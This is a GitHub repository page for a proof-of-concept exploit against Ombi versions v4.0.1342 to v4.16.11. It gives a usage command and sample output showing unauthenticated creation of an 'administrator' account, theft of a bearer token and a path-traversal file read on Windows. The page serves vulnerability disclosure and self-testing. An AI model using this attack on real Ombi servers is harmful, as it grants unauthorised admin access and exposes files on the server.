Skip to content

Ombi unauthenticated path traversal PoC exploit

Notifications You must be signed in to change notification settings

Diazole/ombi-poc-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

PoC exploit for Ombi

This is a proof of concept exploit used to verify if your Ombi install is vulnerable to unauthenticated admin account creation and path-traversal attack.

This affects version v4.0.1342 - v4.16.11.

This script attempts to create an admin account named 'administrator' and then attempts to read a file using the provided filepath.

The path traversal vulnerbility is only exploitable on Windows as dotnet on Linux doesn't decode %2F - see ASP.NET Core 11544.

Vulnerable Lines:
https://github.com/Ombi-app/Ombi/blob/v4.16.1/src/Ombi/Controllers/V1/IdentityController.cs#L117

https://github.com/Ombi-app/Ombi/blob/v4.16.1/src/Ombi/Controllers/V2/SystemController.cs#L47

Usage

python3 .\exploit.py --scheme http --hostname 127.0.0.1 --port 5000 --path '../../HelloWorld.txt'

python3 .\exploit.py --scheme http --hostname 127.0.0.1 --port 5000 --path '../../HelloWorld.txt'
[+] Checking accessibility (http://127.0.0.1:5000) status... AVAILABLE
[+] Attempting to create 'administrator' with password '6QCKUk9MMteiEt2X5osoxw'
[*] Successfuly created administrator at http://127.0.0.1:5000
[+] Attempting to retrieve bearer token... Successful
[+] Attempting to read ..%5C..%5CHelloWorld.txt
Hello, World!

Requirements

  • Python 3

About

Ombi unauthenticated path traversal PoC exploit

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages